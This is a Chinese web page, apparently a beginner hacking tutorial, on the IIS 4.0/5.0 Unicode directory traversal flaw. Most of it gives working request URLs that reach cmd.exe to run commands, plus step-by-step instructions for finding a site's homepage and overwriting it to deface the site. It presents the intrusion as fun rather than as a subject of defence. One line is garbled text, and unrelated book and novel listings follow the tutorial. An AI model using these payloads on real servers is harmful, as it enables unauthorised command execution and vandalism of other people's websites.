登陆注册
178000000006

黑客初级技术讲解(下续二)

基础知识(2)

今天我们谈谈unicode漏洞,这可是基础中的基础,重点里的重点,不懂的一定要好好学。

2000年10月17日中联绿盟发布了以下的安全公告:

微软IIS 4.0 / 5.0 扩展UNICODE目录遍历漏洞

远程漏洞:是

本地漏洞:是

发布日期:2000年10月17日

更新日期:2000年10月17日

受影响的版本:

Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0

这可是中国乃至全球网络安全界的一次大变节,入侵nt/2000系统变得如此简单,不打补丁的死路一条。

下面开始正式学习:

一,UNICODE漏洞的原理

此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1, 中国台湾繁体中文也同样存在这样的漏洞。

中文版的WIN2000中,UNICODE编码 存在BUG,在UNICODE 编码中

%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ’/’

%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ’\’

在NT4中/编码为%c1%9c

在英文版里: WIN2000英文版%c0%af

在中文win2k里:%c1%1c

此外还有多种编码,不一一阐述。

本文例子均以win2k为准,其他类型请自行替换。

基础知识(3)

二,一切从基础开始

由于winnt\system32\cmd.exe的存在,使远程执行命令变为可能,在浏览器里输入以下请求:(假设11.11.22.22有漏洞)

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

学过dos的应该可以看懂,其实就是利用当中的非法请求使我们可以连到system32下,如果inetpub\目录不合winnt同盘,或者目录级数有改动,可能会引起请求失败。

如果成功,那么在浏览区可看到如下信息:

Directory of C:\inetpub\scripts

2000-09-28 15:49 〈DIR〉 .

2000-09-28 15:49 〈DIR〉 .. (假设目录中没有文件,实际上有一大堆)

是不是有自己机器的感觉了,正点!就是这种感觉!

cmd.exe相当与dos里的command.com,因此,我们可以执行很多命令了!

http://11.11.22.22/msadc/..%c1%1 ... em32/cmd.exe?/c+dir (这个命令同样道理)

大家请注意:/c后面的+,实际上,他就是空格,请记牢!dir开始就是dos命令了,我们可以更改一下:

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe

会dos的朋友一定懂其意义了,不懂的请去看书 .

不用说,大家也知道我们就可以利用它来对有漏洞的机器展开攻击了!

三,实战演练

1,修改主页!(是不是很爽?)

一般主页位置在c:\inetpub\wwwroot下,但要是改了路径,就需要找找了。

最方便的方法:在浏览器里输入 http://11.11.22.22/.ida要是有漏洞,那在浏?..皇俏颐堑氖籽 ?/a>

分析法:用dir看各个盘符的根目录,看可疑的就进去看,运气好的在一分钟里找到,这要看运气和直觉。

dir/s法:首先在看其主页,找个图片或连接,看它的文件名,比如,11.11.22.22首页上有一幅图片,右击,属性,看到了吗?iloveu.gif,然后我们利用unicode输入这条命令dir c:\iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif,注意实际应用时别忘了把空格改为+,如果没有继续找d盘,很快就能确定主页目录的。

找到了目录,就要对它开刀了!一般默认收页为index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一个,现在我们确定11.11.22.22中为index.htm

那么我们就修改它吧!

最方便的方法:echo法。echo是一个系统命令,主要用于设置回应开关,而echo cshu >c:\autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容,echo cshunice >>c:\autoexec.bat就是加入cshunice但不删除原有内容,这样我们就可以逍遥的改了。

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

回应为:HTTP 500 - 内部服务器错误

通过对cmd的分析,袁哥得出一条简便的方法,加入符号

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+2001730+>>c:\inetpub\wwwroot\index.htm

回应为:cgi错误,不用理会

两条命令一下,呵呵,再看看11.11.22.22,是不是烙上我们的大名了?不错吧

而在实际操作中,可能袁哥的方法也会失效,这时,我们就可以copy cmd.exe 为另一个exe,记住路径,用copy后的来echo

例如:11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe

11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

2,上传法:echo有点不讲道理,把人家的文件破坏了,要是想在主页上增光添彩,那就应该用改好的主页

同类推荐
  • 青少年最想问的60个心理问题

    青少年最想问的60个心理问题

    尊敬的书友,本书选载最精华部分供您阅读。留足悬念,同样精彩!结合青少年的心理现状,以简洁、鲜活、富有情趣的文字,再王见了青少年经常遇到的问题,进行心理分析,并为家长和老师提供解决心理问题的方法、对策和建议。表达清晰、分析透彻、观点鲜明,有较强的可读性和实用性,可谓是为青少年而写就的一本心理健康指导书。在《青少年最想问的60个心理问题(最新珍藏版)》的引导下,青少年可以走进自己的内心深处,在一个个故事中净化自己的心灵,呵护自己内心的世界,永葆心理健康,发掘内心的潜能,为成功塑造人生观和世界观打下坚实的基础。
  • 看穿人心术,拿来就用

    看穿人心术,拿来就用

    如果能掌握“看穿人心术”,人与人之间的沟通会更有效。本书要为您揭晓的“秘术”有:从弦外之音看人际关系、从外表和动作看本性、听到哪些话值得注意、从口头禅看相处之道、从不同的借口洞悉性格等。只要勤加“修炼”,谁都可以更有心机和技巧地处理好人际关系,让家庭更和睦、让工作环境更舒适。尊敬的书友,本书选载最精华部分供您阅读。留足悬念,同样精彩!
  • 计算机探密

    计算机探密

    黑客的精神态度是很重要的,但技术则更是重要.黑客的态度虽然是无可取代,随著新科技的发明和旧技术的取代,这些工具随时间在慢慢的改变.要成为一位真正的黑客,你必须要能在几天之内将manual内容和你目前己经知道的关连起学会一种新的语言.也就是说,你必会学还了C之外的东西,你至少还要会LIS/P或Perl(Java也正在努力的挤上这个名单;译者注: 我很怀疑这份名单).除了几个重要的hacking常用语言之外,这些语言提供你一些不同的程序设计途径,并且让你在好的方法中学习.
  • 告诉孩子钱该怎么花

    告诉孩子钱该怎么花

    尊敬的书友,本书选载最精华部分供您阅读。留足悬念,同样精彩!本书是青少年金钱和理财知识教育的实用读本,从介绍、分析中国孩子目前普通存在的错误金钱观和不合理消费行为开始,根据孩子不同年龄段的心智和行为能力水平,为如何开展并实施理财教育,提供了一系列细致的理论和实用的方法指导。
热门推荐
  • 段誉之子异界游

    段誉之子异界游

    大理国国君段誉之子段天,一觉醒来后发现自己来到了另一个世界,还好段天身上带有逍遥派的镇派之宝逍遥戒,而且身兼大理段家和逍遥派的众多武学,且看段天怎样以逍遥之名纵横异界。
  • 重生之凡而不凡

    重生之凡而不凡

    顾凡凡,22岁,大学毕业生,因一次偶然的巧合而回到了8岁小学三年级还附赠了一个空间!这让顾凡凡又喜又悲。就当顾凡凡正规划着以后的美好生活的时候,某腹黑说:“凡凡,待你长发及腰,我娶你可好!”凡凡:“......小朋友,你谁啊,我们认识吗?”
  • 异界之灭天

    异界之灭天

    遗落国度的王族遗孤,一步步走向强者,成立年兽帝国,创造历史神话!
  • 穿越之王爷王爷

    穿越之王爷王爷

    没错,就是我,宁雨,在现代是个至尊杀手,世界上人人都害怕的杀手。在现代可是没有亲人的孤儿一个,在孤儿院里认识了同命运的花凤,所以她们一起加入了秘密杀手组织,但是,谁知她为了至尊杀手的名号而在任务中偷袭了自己,自己到死也想不明白,她为什么会变成这样的人。
  • 心岛有你,深海不蓝

    心岛有你,深海不蓝

    “良颂,良颂。你说你为什么姓良呢?我还是头一回见到这个姓呢。你再写作业可就跟作业长得一个样儿了,跟我说会儿话吧。”自习课上解溪不停地在良颂耳边说着,声音清脆,让人听着就能跟着她一起欢快起来。一边儿说着一边儿把良颂手里的笔抢走,使劲儿藏在身后。“给我。”“不给。”“不给我就……”良颂坏笑一下,就伸手开始挠解溪的痒痒。“哎呀,哈哈,哈哈,给你,给你,别挠了别挠了。哈哈,哈哈。”“良颂哈哈,我错了,我错了。”“知道错了就好,你呀你呀。”良颂揉了揉她的头发,假装生气的说“我得好好学习,你老是这样。到时候拿不上奖学金就把你赔给我好了。”
  • 末日里的剑仙

    末日里的剑仙

    末曰将至,暴发丧尸危机,道家仙门重新出山,抗天灾平人祸,抵御外星文明,探索仙界的秘密,且看主角怎么样一步步在这乱世生存,登临绝顶。读者请加入615588635QQ群一起讨论,一起成长。
  • 我的11岁

    我的11岁

    在每个人的生活中,都会或多或少的遇到坎坷,在此过程中会不断的成长,不断的坚强,慢慢得变强大起来,也许这就是生活吧。。。
  • 吞魔战记

    吞魔战记

    紫幽大陆,魔人四起,烽火连天不休。看落风如何斗魔平乱,尽在《吞魔战记》!
  • 忆沉朵儿

    忆沉朵儿

    夏子轩,一个医生,医学界中大名鼎鼎的脑科主治大夫,他医过形形色色,成百上千的病人,可他却怎么也没有想到:她,也会躺在病床上来让他医治,不对!是伤害!!
  • 网游之恶魔邮差

    网游之恶魔邮差

    “都是玩网游的~为什么别人的职业那么牛,而我却只能是个邮差????老天你不公!!!”一个猥琐的声音响彻天空。“系统提示:由于诋毁主脑,所有属性下降百分之十”“我靠!!!”